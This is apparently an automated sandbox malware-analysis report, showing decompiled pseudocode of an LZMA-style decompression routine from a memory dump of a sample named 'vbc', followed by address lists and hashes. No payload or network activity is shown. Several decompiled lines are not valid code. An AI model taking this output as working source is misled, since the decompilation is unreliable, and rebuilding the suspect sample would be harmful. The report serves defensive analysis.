								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x0040673b
0x00406742
0x00406748
0x0040674e
0x00000000
0x00406752
0x0040675e
0x0040675e
0x0040675e
0x00406767
0x00000000
0x00000000
0x0040676d
0x00000000
0x00406774
0x00406778
0x00000000
0x00000000
0x00406781
0x00406784
0x00406787
0x00406789
0x0040678b
0x00000000
0x00000000
0x00406791
0x00406794
0x00406796
0x00406797
0x0040679a
0x0040679c
0x0040679d
0x0040679f
0x004067a2
0x004067a7
0x004067ac
0x004067b5
0x004067c8
0x004067cb
0x004067d4
0x004067d7
0x004067ff
0x004067ff
0x00406801
0x0040680f
0x0040680f
0x00406813
0x00000000
0x00000000
0x00000000
0x00000000
0x00406803
0x00406803
0x00406806
0x00406806
0x00406807
0x00406807
0x00000000
0x00406803
0x004067d9
0x004067dd
0x004067e2
0x004067e2
0x004067eb
0x004067f1
0x004067f3
0x004067f6
0x00000000
0x004067fc
0x004067fc
0x00000000
0x004067fc
0x00000000
0x00406819
0x00406819
0x0040681d
0x004070c9
0x00000000
0x004070c9
0x00406826
0x00406836
0x00406839
0x0040683c
0x0040683c
0x0040683c
0x0040683f
0x0040683f
0x00406843
0x00000000
0x00000000
0x00406845
0x00406848
0x0040684b
0x00406875
0x0040687b
0x00406882
0x00000000
0x00406882
0x0040684d
0x00406851
0x00406854
0x00406859
0x00406859
0x00406864
0x0040686a
0x0040686c
0x0040686f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b4
0x004068ba
0x004068bd
0x004068ca
0x004068d2
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688d
0x004070d8
0x00000000
0x004070d8
0x00406899
0x004068a4
0x004068a4
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f58
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f8e
0x00406f95
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f97
0x00406f97
0x00406f9b
0x0040714a
0x00000000
0x0040714a
0x00406fa7
0x00406fae
0x00406fb6
0x00406fb6
0x00406fb6
0x00406fb9
0x00406fbc
0x00406fbc
0x00000000
0x00000000
0x004068da
0x004068dc
0x004068df
0x00406950
0x00406953
0x00406956
0x0040695d
0x00406967
0x00000000
0x00406967
0x004068e1
0x004068e5
0x004068e8
0x004068ea
0x004068ed
0x004068f0
0x004068f2
0x004068f5
0x004068f7
0x004068fc
0x004068ff
0x00406902
0x00406906
0x0040690d
0x00406910
0x00406917
0x0040691b
0x00406923
0x00406923
0x00406923
0x0040691d
0x0040691d
0x0040691d
0x00406912
0x00406912
0x00406912
0x00406927
0x0040692a
0x00406948
0x0040694a
0x00000000
0x0040694a
0x0040692c
0x0040692f
0x00406932
0x00406935
0x00406937
0x00406937
0x00406937
0x0040693a
0x0040693d
0x0040693f
0x00406940
0x00406943
0x00000000
0x00000000
0x00406b79
0x00406b7d
0x00406b9b
0x00406b9e
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb6
0x00406bbd
0x00406bbe
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bce
0x00000000
0x00406bce
0x00406b7f
0x00406b82
0x00406b85
0x00406b8f
0x00000000
0x00000000
0x00406be3
0x00406be7
0x00406c0a
0x00406c0d
0x00406c10
0x00406c1a
0x00406be9
0x00406be9
0x00406bec
0x00406bef
0x00406bf2
0x00406bff
0x00406c02
0x00406c02
0x00000000
0x00000000
0x00406c26
0x00406c2a
0x00000000
0x00000000
0x00406c30
0x00406c34
0x00000000
0x00000000
0x00406c3a
0x00406c3c
0x00406c40
0x00406c40
0x00406c43
0x00406c47
0x00000000
0x00000000
0x00406c97
0x00406c9b
0x00406ca2
0x00406ca5
0x00406ca8
0x00406cb2
0x00000000
0x00406cb2
0x00406c9d
0x00000000
0x00000000
0x00406cbe
0x00406cc2
0x00406cc9
0x00406ccc
0x00406ccf
0x00406cc4
0x00406cc4
0x00406cc4
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce1
0x00406ce4
0x00406ceb
0x00406cf0
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d82
0x00407120
0x00000000
0x00407120
0x00406d88
0x00406d8b
0x00406d8e
0x00406d92
0x00406d95
0x00406d9b
0x00406d9d
0x00406d9d
0x00406d9d
0x00406da0
0x00406da3
0x00000000
0x00000000
0x00406973
0x00406973
0x00406977
0x004070e4
0x00000000
0x004070e4
0x0040697d
0x00406980
0x00406983
0x00406987
0x0040698a
0x00406990
0x00406992
0x00406992
0x00406992
0x00406995
0x00406998
0x00406998
0x0040699b
0x0040699e
0x00000000
0x00000000
0x004069a4
0x004069aa
0x00000000
0x00000000
0x004069b0
0x004069b0
0x004069b4
0x004069b7
0x004069ba
0x004069bd
0x004069c0
0x004069c1
0x004069c4
0x004069c6
0x004069cc
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069db
0x004069de
0x004069fa
0x004069fd
0x00406a00
0x00406a03
0x00406a0a
0x00406a0e
0x00406a10
0x00406a14
0x004069e0
0x004069e0
0x004069e4
0x004069ec
0x004069f1
0x004069f3
0x004069f5
0x004069f5
0x00406a17
0x00406a1e
0x00406a21
0x00000000
0x00406a27
0x00000000
0x00406a27
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x004070f0
0x00000000
0x004070f0
0x00406a36
0x00406a39
0x00406a3c
0x00406a40
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4b
0x00406a4e
0x00406a51
0x00406a51
0x00406a51
0x00406a57
0x00000000
0x00000000
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a77
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a9b
0x00406a9f
0x00406aa1
0x00406a79
0x00406a79
0x00406a81
0x00406a86
0x00406a88
0x00406a8a
0x00406a8a
0x00406aa4
0x00406aab
0x00406aae
0x00000000
0x00406ab0
0x00000000
0x00406ab0
0x00406aae
0x00406ab5
0x00406ab5
0x00406ab5
0x00406ab5
0x00000000
0x00000000
0x00406af0
0x00406af0
0x00406af4
0x004070fc
0x00000000
0x004070fc
0x00406afa
0x00406afd
0x00406b00
0x00406b04
0x00406b07
0x00406b0d
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b1b
0x00406ab9
0x00406ab9
0x00406abc
0x00000000
0x00406abc
0x00406b1d
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b38
0x00406b3b
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5c
0x00406b5f
0x00406b63
0x00406b65
0x00406b3d
0x00406b3d
0x00406b45
0x00406b4a
0x00406b4c
0x00406b4e
0x00406b4e
0x00406b68
0x00406b6f
0x00406b72
0x00000000
0x00406b74
0x00000000
0x00406b74
0x00000000
0x00406e01
0x00406e01
0x00406e05
0x0040712c
0x00000000
0x0040712c
0x00406e0b
0x00406e0e
0x00406e11
0x00406e15
0x00406e18
0x00406e1e
0x00406e20
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406bd1
0x00406bd1
0x00406bd4
0x00000000
0x00000000
0x00406f10
0x00406f14
0x00406f36
0x00406f39
0x00406f43
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f16
0x00406f19
0x00406f1d
0x00406f20
0x00406f20
0x00406f23
0x00000000
0x00000000
0x00406fcd
0x00406fd1
0x00406fef
0x00406fef
0x00406fef
0x00406ff6
0x00406ffd
0x00407004
0x00407004
0x00000000
0x00407004
0x00406fd3
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe3
0x00406f27
0x00406f27
0x00406f2a
0x00000000
0x00000000
0x004070be
0x004070c1
0x00000000
0x00000000
0x00406cf8
0x00406cfa
0x00406d01
0x00406d02
0x00406d04
0x00406d07
0x00000000
0x00000000
0x00406d0f
0x00406d12
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d1a
0x00406d1d
0x00406d24
0x00406d27
0x00406d35
0x00000000
0x00000000
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00000000
0x00000000
0x0040701a
0x0040701a
0x0040701e
0x00407156
0x00000000
0x00407156
0x00407024
0x00407027
0x0040702a
0x0040702e
0x00407031
0x00407037
0x00407039
0x00407039
0x00407039
0x0040703c
0x0040703f
0x0040703f
0x0040703f
0x0040703f
0x00407042
0x00407042
0x00407046
0x004070a6
0x004070a9
0x004070ae
0x004070af
0x004070b1
0x004070b3
0x004070b6
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x00407048
0x0040704e
0x00407051
0x00407054
0x00407057
0x0040705a
0x0040705d
0x00407060
0x00407063
0x00407066
0x00407069
0x00407082
0x00407085
0x00407088
0x0040708b
0x0040708f
0x00407091
0x00407091
0x00407092
0x00407095
0x0040706b
0x0040706b
0x00407073
0x00407078
0x0040707a
0x0040707d
0x0040707d
0x00407098
0x0040709f
0x00000000
0x004070a1
0x00000000
0x004070a1
0x00000000
0x00406d3d
0x00406d40
0x00406d76
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea9
0x00406ea9
0x00406eac
0x00406eae
0x00407138
0x00000000
0x00407138
0x00406eb4
0x00406eb7
0x00000000
0x00000000
0x00406ebd
0x00406ec1
0x00406ec4
0x00406ec4
0x00406ec4
0x00000000
0x00406ec4
0x00406d42
0x00406d44
0x00406d46
0x00406d48
0x00406d4b
0x00406d4c
0x00406d4e
0x00406d50
0x00406d53
0x00406d56
0x00406d6c
0x00406d71
0x00406da9
0x00406da9
0x00406dad
0x00406dd9
0x00406ddb
0x00406de2
0x00406de5
0x00406de8
0x00406de8
0x00406ded
0x00406ded
0x00406def
0x00406df2
0x00406df9
0x00406dfc
0x00406e29
0x00406e29
0x00406e2c
0x00406e2f
0x00406ea3
0x00406ea3
0x00406ea3
0x00000000
0x00406ea3
0x00406e31
0x00406e37
0x00406e3a
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e49
0x00406e4c
0x00406e4f
0x00406e52
0x00406e6b
0x00406e6d
0x00406e70
0x00406e71
0x00406e74
0x00406e76
0x00406e79
0x00406e7b
0x00406e7d
0x00406e80
0x00406e82
0x00406e85
0x00406e89
0x00406e8b
0x00406e8b
0x00406e8c
0x00406e8f
0x00406e92
0x00406e54
0x00406e54
0x00406e5c
0x00406e61
0x00406e63
0x00406e66
0x00406e66
0x00406e95
0x00406e9c
0x00406e26
0x00406e26
0x00406e26
0x00406e26
0x00000000
0x00406e9e
0x00000000
0x00406e9e
0x00406e9c
0x00406daf
0x00406db2
0x00406db4
0x00406db7
0x00406dba
0x00406dbd
0x00406dbf
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dc8
0x00406dc8
0x00406dcb
0x00406dd2
0x00406da6
0x00406da6
0x00406da6
0x00406da6
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406d58
0x00406d5b
0x00406d5d
0x00406d60
0x00000000
0x00000000
0x00406abf
0x00406abf
0x00406ac3
0x00407108
0x00000000
0x00407108
0x00406ac9
0x00406acc
0x00406acf
0x00406ad2
0x00406ad5
0x00406ad8
0x00406adb
0x00406add
0x00406ae0
0x00406ae3
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae8
0x00000000
0x00000000
0x00406c4a
0x00406c4a
0x00406c4e
0x00407114
0x00000000
0x00407114
0x00406c54
0x00406c57
0x00406c5a
0x00406c5d
0x00406c5f
0x00406c5f
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c71
0x00406c72
0x00406c74
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c80
0x00406c80
0x00406c80
0x00406c83
0x00406c85
0x00406c85
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406ec7
0x00406ecb
0x00000000
0x00000000
0x00406ed1
0x00406ed4
0x00406ed7
0x00406eda
0x00406edc
0x00406edc
0x00406edc
0x00406edf
0x00406ee2
0x00406ee5
0x00406ee8
0x00406eeb
0x00406eee
0x00406eef
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f04
0x00406f06
0x00406f09
0x00000000
0x00406f0b
0x00406c88
0x00406c88
0x00000000
0x00406c88
0x00406f09
0x0040713e
0x00407160
0x00407166
0x00407168
0x0040716f
0x00000000
0x00000000
0x0040676d
0x00407175
0x00407175
0x00000000

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
Instruction ID: b0390ff044984b209d4cab8587791f90ef454c2be00e5ddb87b3a87963c4087b
Opcode Fuzzy Hash: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
Instruction Fuzzy Hash: 83814631D04229DBDB24CFA9C844BAEBBB1FB44305F21816AD856BB2C1C7786986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406B79 Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406B79() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M0040717D))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
